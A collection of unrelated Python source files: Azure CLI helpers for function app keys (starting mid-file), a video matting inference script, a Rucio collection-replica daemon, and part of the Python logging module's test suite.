        result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
    else:
        result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
    if result.response.status_code == HTTPStatus.NO_CONTENT:
        return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
    if result.response.status_code == HTTPStatus.NOT_FOUND:
        return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
    return result
def show_function(cmd, resource_group_name, name, function_name):
    """Show one function of a function app, or a message when it is missing."""
    result = web_client_factory(cmd.cli_ctx).web_apps.get_function(resource_group_name, name, function_name)
    if result is None:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return result
def delete_function(cmd, resource_group_name, name, function_name):
    """Delete a function from a function app and report the outcome."""
    client = web_client_factory(cmd.cli_ctx)
    result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
    status = result.response.status_code
    if status == HTTPStatus.NO_CONTENT:
        return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
    if status == HTTPStatus.NOT_FOUND:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
    """Create or update a key on a single function of a function app.

    :param key_value: value to set; passed through as-is (may be None).
    :param slot: optional deployment slot name.
    """
    # pylint: disable=protected-access
    # NOTE(review): presumably this re-maps KeyInfo serialization so that
    # name/value are nested under 'properties.' in the request body — confirm
    # against the SDK. The class attribute is mutated globally.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
                                                                     name,
                                                                     function_name,
                                                                     key_name,
                                                                     slot,
                                                                     name1=key_name,
                                                                     value=key_value)
    return client.web_apps.create_or_update_function_secret(resource_group_name,
                                                            name,
                                                            function_name,
                                                            key_name,
                                                            name1=key_name,
                                                            value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
    """List the keys of a single function (optionally from a slot)."""
    webapps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return webapps.list_function_keys_slot(resource_group_name, name, function_name, slot)
    return webapps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
    """Delete a function-scoped key and report the outcome.

    Fix: the slot branch previously fell through and issued the non-slot
    delete as well, discarding the slot result and deleting the key from
    the production app too.
    """
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        result = client.web_apps.delete_function_secret_slot(resource_group_name,
                                                             name,
                                                             function_name,
                                                             key_name,
                                                             slot,
                                                             raw=True)
    else:
        result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
    if result.response.status_code == HTTPStatus.NO_CONTENT:
        return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
    if result.response.status_code == HTTPStatus.NOT_FOUND:
        return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
    return result
|
inference_video.py | """
Inference video: Extract matting on video.
Example:
python inference_video.py \
--model-type mattingrefine \
--model-backbone resnet50 \
--model-backbone-scale 0.25 \
--model-refine-mode sampling \
--model-refine-sample-pixels 80000 \
--model-checkpoint "PATH_TO_CHECKPOINT" \
--video-src "PATH_TO_VIDEO_SRC" \
--video-bgr "PATH_TO_VIDEO_BGR" \
--video-resize 1920 1080 \
--output-dir "PATH_TO_OUTPUT_DIR" \
--output-type com fgr pha err ref \
--video-target-bgr "PATH_TO_VIDEO_TARGET_BGR"
"""
import argparse
import cv2
import torch
import os
import shutil
from torch import nn
from torch.nn import functional as F
from torch.utils.data import DataLoader
from torchvision import transforms as T
from torchvision.transforms.functional import to_pil_image
from threading import Thread
from tqdm import tqdm
from PIL import Image
from dataset import VideoDataset, ZipDataset
from dataset import augmentation as A
from model import MattingBase, MattingRefine
from inference_utils import HomographicAlignment
from read_write_utils import VideoReader, VideoWriter
# Output-mode switches (module-level, checked in the conversion loop):
# Reduced output to pha and fgr (skip err/ref even for mattingrefine).
REDUCED_OUTPUT = True
# Reduced output to pha only (only takes effect when REDUCED_OUTPUT is True).
PHA_ONLY = False

# --------------- Arguments ---------------

parser = argparse.ArgumentParser(description='Inference video')
parser.add_argument('--model-type', type=str, required=True, choices=['mattingbase', 'mattingrefine'])
parser.add_argument('--model-backbone', type=str, required=True, choices=['resnet101', 'resnet50', 'mobilenetv2'])
parser.add_argument('--model-backbone-scale', type=float, default=0.25)
parser.add_argument('--model-checkpoint', type=str, required=True)
parser.add_argument('--model-refine-mode', type=str, default='sampling', choices=['full', 'sampling', 'thresholding','fastfull'])
parser.add_argument('--model-refine-sample-pixels', type=int, default=80_000)
parser.add_argument('--model-refine-threshold', type=int, default=10)  # model-refine-threshold / 100
parser.add_argument('--model-refine-kernel-size', type=int, default=3)

parser.add_argument('--video-src', type=str, required=True)
parser.add_argument('--video-bgr', type=str, required=True)
parser.add_argument('--video-target-bgr', type=str, default=None, help="Path to video onto which to composite the output (default to flat green)")
# Resize is given as WIDTH HEIGHT on the command line.
parser.add_argument('--video-resize', type=int, default=None, nargs=2)

parser.add_argument('--device', type=str, choices=['cpu', 'cuda'], default='cuda')
parser.add_argument('--preprocess-alignment', action='store_true')
parser.add_argument('--output-dir', type=str, required=True)
parser.add_argument('--output-types', type=str, required=True, nargs='+', choices=['com', 'pha', 'fgr', 'err', 'ref'])
parser.add_argument('--output-format', type=str, default='video', choices=['video', 'image_sequences'])
# Multiplier applied to the alpha matte before clamping to [0, 1].
parser.add_argument('--pha-gain', type=float, default=1.0)
parser.add_argument('--precision', type=str, default='float32', choices=['float32', 'float16'])
parser.add_argument('--output-video-mbps', type=int, default=100)

args = parser.parse_args()

# Cross-flag validation: err/ref outputs only make sense for certain models.
assert 'err' not in args.output_types or args.model_type in ['mattingbase', 'mattingrefine'], \
    'Only mattingbase and mattingrefine support err output'
assert 'ref' not in args.output_types or args.model_type in ['mattingrefine'], \
    'Only mattingrefine support ref output'
# --------------- Utils ---------------
# class VideoWriter:
# def __init__(self, path, frame_rate, width, height):
# self.out = cv2.VideoWriter(path, cv2.VideoWriter_fourcc(*'mp4v'), frame_rate, (width, height))
# def add_batch(self, frames):
# frames = frames.mul(255).byte()
# frames = frames.cpu().permute(0, 2, 3, 1).numpy()
# for i in range(frames.shape[0]):
# frame = frames[i]
# frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
# self.out.write(frame)
class ImageSequenceWriter:
    """Writes batches of image tensors as consecutively numbered image files.

    Each batch is written on a background thread so disk I/O does not block
    the inference loop.
    """

    def __init__(self, path, extension):
        """Create the output directory (must not already exist)."""
        self.path = path
        self.extension = extension
        self.index = 0
        os.makedirs(path)

    def add_batch(self, frames):
        """Queue a (N, C, H, W) batch of frames for asynchronous writing."""
        Thread(target=self._add_batch, args=(frames, self.index)).start()
        self.index += frames.shape[0]

    # Fix: the conversion loop calls writer.write(...) and writer.close()
    # (the VideoWriter API) on every writer, but this class only defined
    # add_batch — image_sequences mode crashed with AttributeError. Alias
    # write to add_batch and add a no-op close for API parity.
    write = add_batch

    def close(self):
        """No-op: each batch thread writes and finishes independently."""

    def _add_batch(self, frames, index):
        # Background worker: move to CPU, then save frames one by one.
        frames = frames.cpu()
        for i in range(frames.shape[0]):
            frame = frames[i]
            frame = to_pil_image(frame)
            frame.save(os.path.join(self.path, str(index + i).zfill(5) + '.' + self.extension))
# --------------- Main ---------------

device = torch.device(args.device)

# Load model (choices on --model-type guarantee exactly one branch runs).
if args.model_type == 'mattingbase':
    model = MattingBase(args.model_backbone)
if args.model_type == 'mattingrefine':
    model = MattingRefine(
        args.model_backbone,
        args.model_backbone_scale,
        args.model_refine_mode,
        args.model_refine_sample_pixels,
        args.model_refine_threshold,
        args.model_refine_kernel_size)

# strict=False tolerates checkpoints with extra or missing keys.
model.load_state_dict(torch.load(args.model_checkpoint, map_location=device), strict=False)
if args.precision == 'float32':
    precision = torch.float32
else:
    precision = torch.float16
model = model.eval().to(device=device, dtype=precision)

# Load video and background
vid = VideoDataset(args.video_src)
# NOTE(review): the background is opened with PIL, so --video-bgr is treated
# as a single still image here despite the flag name — confirm with callers.
bgr = [Image.open(args.video_bgr).convert('RGB')]
# T.Resize takes (height, width), hence the [::-1] on the (w, h) CLI value.
dataset = ZipDataset([vid, bgr], transforms=A.PairCompose([
    A.PairApply(T.Resize(args.video_resize[::-1]) if args.video_resize else nn.Identity()),
    HomographicAlignment() if args.preprocess_alignment else A.PairApply(nn.Identity()),
    A.PairApply(T.ToTensor())
]))
if args.video_target_bgr:
    dataset = ZipDataset([dataset, VideoDataset(args.video_target_bgr, transforms=T.ToTensor())])

# Create output directory; ask before clobbering an existing one.
if os.path.exists(args.output_dir):
    if input(f'Directory {args.output_dir} already exists. Override? [Y/N]: ').lower() == 'y':
        shutil.rmtree(args.output_dir)
    else:
        exit()
os.makedirs(args.output_dir)
# Prepare writers: one writer per requested output type, either mp4 videos
# or per-frame image sequences depending on --output-format.
if args.output_format == 'video':
    # Output dimensions follow the optional resize, else the source video.
    # NOTE(review): h and w are computed but not passed to VideoWriter below —
    # presumably the writer infers them from the first batch; confirm.
    h = args.video_resize[1] if args.video_resize is not None else vid.height
    w = args.video_resize[0] if args.video_resize is not None else vid.width
    frame_rate = vid.frame_rate
    output_video_mbps = args.output_video_mbps
    # gen output filename from video_src
    basename_without_ext = os.path.splitext(os.path.basename(args.video_src))[0]
    out_filename = basename_without_ext
    # bit_rate is --output-video-mbps converted to bits per second.
    if 'com' in args.output_types:
        com_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_com.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    if 'pha' in args.output_types:
        pha_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_pha.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    if 'fgr' in args.output_types:
        fgr_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_fgr.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    if 'err' in args.output_types:
        err_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_err.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    if 'ref' in args.output_types:
        ref_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_ref.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    # Kept for reference: alternative naming scheme based on video_target_bgr.
    # root, ext = os.path.splitext(args.video_target_bgr)
    # out_filename = root[1:]
    # if 'com' in args.output_types:
    #     com_writer = VideoWriter(path=os.path.join(args.output_dir, "EP" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    # if 'pha' in args.output_types:
    #     pha_writer = VideoWriter(path=os.path.join(args.output_dir, "EK" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    # if 'fgr' in args.output_types:
    #     fgr_writer = VideoWriter(path=os.path.join(args.output_dir, "EF" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    # if 'err' in args.output_types:
    #     err_writer = VideoWriter(path=os.path.join(args.output_dir, "EE" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
    # if 'ref' in args.output_types:
    #     ref_writer = VideoWriter(path=os.path.join(args.output_dir, "ER" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
else:
    # Image sequences: one numbered file per frame, per output type.
    # com is saved as png so it can carry an alpha channel (rgba).
    if 'com' in args.output_types:
        com_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'com'), 'png')
    if 'pha' in args.output_types:
        pha_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'pha'), 'jpg')
    if 'fgr' in args.output_types:
        fgr_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'fgr'), 'jpg')
    if 'err' in args.output_types:
        err_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'err'), 'jpg')
    if 'ref' in args.output_types:
        ref_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'ref'), 'jpg')
# Conversion loop: run the model frame-by-frame and stream each requested
# output type to its writer; writers are closed in the finally block.
try:
    with torch.no_grad():
        for input_batch in tqdm(DataLoader(dataset, batch_size=1, pin_memory=True)):
            if args.video_target_bgr:
                (src, bgr), tgt_bgr = input_batch
                tgt_bgr = tgt_bgr.to(device, dtype=precision, non_blocking=True)
            else:
                src, bgr = input_batch
                # Flat green background (RGB 120,255,155), broadcast over the frame.
                tgt_bgr = torch.tensor([120/255, 255/255, 155/255], device=device,dtype=precision).view(1, 3, 1, 1)
            src = src.to(device, dtype=precision, non_blocking=True)
            bgr = bgr.to(device, dtype=precision, non_blocking=True)

            if args.model_type == 'mattingbase':
                pha, fgr, err, _ = model(src, bgr)
            elif args.model_type == 'mattingrefine':
                if(REDUCED_OUTPUT):
                    # NOTE(review): in reduced modes 'err'/'ref' are never
                    # assigned, so requesting --output-types err/ref here
                    # would raise NameError below — confirm intended usage.
                    if(PHA_ONLY):
                        # Reduced output to pha only
                        pha, _ = model(src, bgr)
                    else:
                        # Reduced output to pha and fgr
                        pha, fgr = model(src, bgr)
                else:
                    pha, fgr, _, _, err, ref = model(src, bgr)
            elif args.model_type == 'mattingbm':
                # NOTE(review): 'mattingbm' is not among the --model-type
                # choices, so this branch appears unreachable via the CLI.
                pha, fgr = model(src, bgr)

            # Apply gain to pha, then clamp back into the valid alpha range.
            pha = pha * args.pha_gain
            pha = torch.clamp(pha, 0.0, 1.0)

            if 'com' in args.output_types:
                if args.output_format == 'video':
                    # Output composite with green background
                    com = fgr * pha + tgt_bgr * (1 - pha)
                    com_writer.write(com)
                else:
                    # Output composite as rgba png images
                    com = torch.cat([fgr * pha.ne(0), pha], dim=1)
                    com_writer.write(com)
            if 'pha' in args.output_types:
                pha_writer.write(pha)
            if 'fgr' in args.output_types:
                fgr_writer.write(fgr)
            if 'err' in args.output_types:
                # err/ref come out at reduced resolution; upsample to frame size.
                err_writer.write(F.interpolate(err, src.shape[2:], mode='bilinear', align_corners=False))
            if 'ref' in args.output_types:
                ref_writer.write(F.interpolate(ref, src.shape[2:], mode='nearest'))
finally:
    # Clean up: close every writer that was opened for a requested type.
    if 'com' in args.output_types:
        com_writer.close()
    if 'pha' in args.output_types:
        pha_writer.close()
    if 'fgr' in args.output_types:
        fgr_writer.close()
    if 'err' in args.output_types:
        err_writer.close()
    if 'ref' in args.output_types:
        ref_writer.close()
|
collection_replica.py | # -*- coding: utf-8 -*-
# Copyright 2018-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - Martin Barisits <martin.barisits@cern.ch>, 2020
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2021
"""
Abacus-Collection-Replica is a daemon to update collection replica.
"""
import logging
import os
import socket
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.logging import setup_logging
from rucio.common.utils import daemon_sleep
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.replica import get_cleaned_updated_collection_replicas, update_collection_replica
graceful_stop = threading.Event()
def collection_replica_update(once=False, limit=1000, sleep_time=10):
    """
    Main loop to check and update the collection replicas.

    :param once: run a single iteration and return instead of looping.
    :param limit: maximum number of updated collection replicas per cycle.
    :param sleep_time: seconds to sleep when there is no (or little) work.
    """
    logging.info('collection_replica_update: starting')

    logging.info('collection_replica_update: started')

    # Make an initial heartbeat so that all abacus-collection-replica daemons have the correct worker number on the next try
    executable = 'abacus-collection-replica'
    hostname = socket.gethostname()
    pid = os.getpid()
    current_thread = threading.current_thread()
    live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)

    while not graceful_stop.is_set():
        try:
            # Heartbeat: refresh liveness and get this worker's thread assignment.
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)

            # Select a bunch of collection replicas to update for this worker
            start = time.time()  # NOQA
            replicas = get_cleaned_updated_collection_replicas(total_workers=heartbeat['nr_threads'] - 1,
                                                               worker_number=heartbeat['assign_thread'],
                                                               limit=limit)

            logging.debug('Index query time %f size=%d' % (time.time() - start, len(replicas)))
            # If the list is empty, sent the worker to sleep
            if not replicas and not once:
                logging.info('collection_replica_update[%s/%s] did not get any work' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1))
                daemon_sleep(start_time=start, sleep_time=sleep_time, graceful_stop=graceful_stop)
            else:
                for replica in replicas:
                    # Bail out mid-batch if a shutdown was requested.
                    if graceful_stop.is_set():
                        break
                    start_time = time.time()
                    update_collection_replica(replica)
                    logging.debug('collection_replica_update[%s/%s]: update of collection replica "%s" took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, replica['id'], time.time() - start_time))
                # A short batch means the backlog is drained; sleep before polling again.
                if limit and len(replicas) < limit and not once:
                    daemon_sleep(start_time=start, sleep_time=sleep_time, graceful_stop=graceful_stop)
        except Exception:
            # Keep the daemon alive on unexpected errors; just log the traceback.
            logging.error(traceback.format_exc())
        if once:
            break

    logging.info('collection_replica_update: graceful stop requested')
    die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
    logging.info('collection_replica_update: graceful stop done')
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signal-handler signature (signum, frame); simply flags all worker
    loops to finish their current iteration and exit.
    """
    graceful_stop.set()
def run(once=False, threads=1, sleep_time=10, limit=1000):
    """
    Starts up the Abacus-Collection-Replica threads.

    :param once: execute a single iteration instead of running as a daemon.
    :param threads: number of worker threads to spawn in daemon mode.
    :param sleep_time: idle sleep in seconds between empty polling cycles.
    :param limit: maximum collection replicas processed per cycle.
    """
    setup_logging()

    if rucio.db.sqla.util.is_old_db():
        raise exception.DatabaseException('Database was not updated, daemon won\'t start')

    executable = 'abacus-collection-replica'
    hostname = socket.gethostname()
    sanity_check(executable=executable, hostname=hostname)

    if once:
        logging.info('main: executing one iteration only')
        # Fix: forward limit/sleep_time so they also apply in once mode
        # (previously only `once` was passed and the CLI options were ignored).
        collection_replica_update(once=once, limit=limit, sleep_time=sleep_time)
    else:
        logging.info('main: starting threads')
        # Local name `workers` avoids shadowing the `threads` count parameter.
        workers = [threading.Thread(target=collection_replica_update,
                                    kwargs={'once': once, 'sleep_time': sleep_time, 'limit': limit})
                   for _ in range(0, threads)]
        [t.start() for t in workers]

        logging.info('main: waiting for interrupts')

        # Interruptible joins require a timeout.
        while workers[0].is_alive():
            [t.join(timeout=3.14) for t in workers]
|
test_logging.py | #!/usr/bin/env python
#
# Copyright 2001-2009 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2009 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import copy
import cPickle
import cStringIO
import gc
import os
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import string
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import threading
import time
import types
import unittest
import warnings
import weakref
class BaseTest(unittest.TestCase):

    """Base class for logging tests."""

    # Handler format and the regex used to parse lines back out of the stream.
    log_format = "%(name)s -> %(levelname)s: %(message)s"
    expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
    message_num = 0

    def setUp(self):
        """Setup the default logging stream to an internal StringIO instance,
        so that we can examine log output as we want."""
        logger_dict = logging.getLogger().manager.loggerDict
        # Snapshot the logging module's private global state under its lock,
        # so tearDown can restore it exactly even if a test mutates it.
        logging._acquireLock()
        try:
            self.saved_handlers = logging._handlers.copy()
            self.saved_handler_list = logging._handlerList[:]
            self.saved_loggers = logger_dict.copy()
            self.saved_level_names = logging._levelNames.copy()
        finally:
            logging._releaseLock()

        # Route the root logger into an in-memory stream at DEBUG level.
        self.root_logger = logging.getLogger("")
        self.original_logging_level = self.root_logger.getEffectiveLevel()

        self.stream = cStringIO.StringIO()
        self.root_logger.setLevel(logging.DEBUG)
        self.root_hdlr = logging.StreamHandler(self.stream)
        self.root_formatter = logging.Formatter(self.log_format)
        self.root_hdlr.setFormatter(self.root_formatter)
        self.root_logger.addHandler(self.root_hdlr)

    def tearDown(self):
        """Remove our logging stream, and restore the original logging
        level."""
        self.stream.close()
        self.root_logger.removeHandler(self.root_hdlr)
        self.root_logger.setLevel(self.original_logging_level)
        # Restore the state snapshotted in setUp, again under the lock.
        logging._acquireLock()
        try:
            logging._levelNames.clear()
            logging._levelNames.update(self.saved_level_names)
            logging._handlers.clear()
            logging._handlers.update(self.saved_handlers)
            logging._handlerList[:] = self.saved_handler_list
            loggerDict = logging.getLogger().manager.loggerDict
            loggerDict.clear()
            loggerDict.update(self.saved_loggers)
        finally:
            logging._releaseLock()

    def assert_log_lines(self, expected_values, stream=None):
        """Match the collected log lines against the regular expression
        self.expected_log_pat, and compare the extracted group values to
        the expected_values list of tuples."""
        stream = stream or self.stream
        pat = re.compile(self.expected_log_pat)
        try:
            stream.reset()
            actual_lines = stream.readlines()
        except AttributeError:
            # StringIO.StringIO lacks a reset() method.
            actual_lines = stream.getvalue().splitlines()
        self.assertEquals(len(actual_lines), len(expected_values))
        for actual, expected in zip(actual_lines, expected_values):
            match = pat.search(actual)
            if not match:
                self.fail("Log line does not match expected pattern:\n" +
                            actual)
            self.assertEquals(tuple(match.groups()), expected)
        # The stream must now be fully consumed; anything left is unexpected.
        s = stream.read()
        if s:
            self.fail("Remaining output at end of log stream:\n" + s)

    def next_message(self):
        """Generate a message consisting solely of an auto-incrementing
        integer."""
        self.message_num += 1
        return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
    """Test builtin levels and their inheritance."""

    def test_flat(self):
        # Logging levels in a flat logger namespace.
        # NOTE: the expected tuples rely on next_message()'s sequential
        # numbering, so the order of the calls below is significant.
        m = self.next_message

        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)

        # These should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())

        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warn(m())
        INF.info(m())

        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warn (m())
        DEB.info (m())
        DEB.debug(m())

        # These should not log.
        ERR.warn(m())
        ERR.info(m())
        ERR.debug(m())

        INF.debug(m())

        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])

    def test_nested_explicit(self):
        # Logging levels in a nested namespace, all explicitly set.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)

        # These should log.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())

        # These should not log.
        INF_ERR.warn(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())

        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])

    def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
        # The *.UNDEF loggers have no explicit level and should behave like
        # their nearest configured ancestor.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")

        # These should log.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warn(m())
        INF_UNDEF.info(m())
        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())

        # These should not log.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warn(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())

        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])

    def test_nested_with_virtual_parent(self):
        # Logging levels when some parent does not exist yet.
        # GRANDCHILD is deliberately created before CHILD.
        m = self.next_message

        INF = logging.getLogger("INF")
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)

        # These should log.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())

        # These should not log.
        GRANDCHILD.debug(m())
        CHILD.debug(m())

        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])
class BasicFilterTest(BaseTest):

    """Test the bundled Filter class."""

    def test_filter(self):
        # Only messages satisfying the specified criteria pass through the
        # filter: Filter("spam.eggs") passes "spam.eggs" and descendants,
        # but not siblings ("spam.bakedbeans") or ancestors ("spam").
        filter_ = logging.Filter("spam.eggs")
        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(filter_)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")

            spam.info(self.next_message())
            spam_eggs.info(self.next_message())  # Good.
            spam_eggs_fish.info(self.next_message())  # Good.
            spam_bakedbeans.info(self.next_message())

            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
# NOTE: unlike the standard logging levels, *higher* numbers here mean
# *quieter* output (SILENT is the highest and most severe).
SILENT      = 120
TACITURN    = 119
TERSE       = 118
EFFUSIVE    = 117
SOCIABLE    = 116
VERBOSE     = 115
TALKATIVE   = 114
GARRULOUS   = 113
CHATTERBOX  = 112
BORING      = 111

# All custom levels, lowest (noisiest) to highest (quietest), inclusive.
LEVEL_RANGE = range(BORING, SILENT + 1)

#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT      : 'Silent',
    TACITURN    : 'Taciturn',
    TERSE       : 'Terse',
    EFFUSIVE    : 'Effusive',
    SOCIABLE    : 'Sociable',
    VERBOSE     : 'Verbose',
    TALKATIVE   : 'Talkative',
    GARRULOUS   : 'Garrulous',
    CHATTERBOX  : 'Chatterbox',
    BORING      : 'Boring',
}
class GarrulousFilter(logging.Filter):
    """A filter which blocks garrulous messages."""

    def filter(self, record):
        # Reject exactly the GARRULOUS level; every other level passes.
        is_garrulous = (record.levelno == GARRULOUS)
        return not is_garrulous
class VerySpecificFilter(logging.Filter):
    """A filter which blocks sociable and taciturn messages."""

    def filter(self, record):
        # Pass any record whose level is not one of the two blocked levels.
        blocked_levels = (SOCIABLE, TACITURN)
        return record.levelno not in blocked_levels
class CustomLevelsAndFiltersTest(BaseTest):

    """Test various filtering possibilities with custom logging levels."""

    # Skip the logger name group.
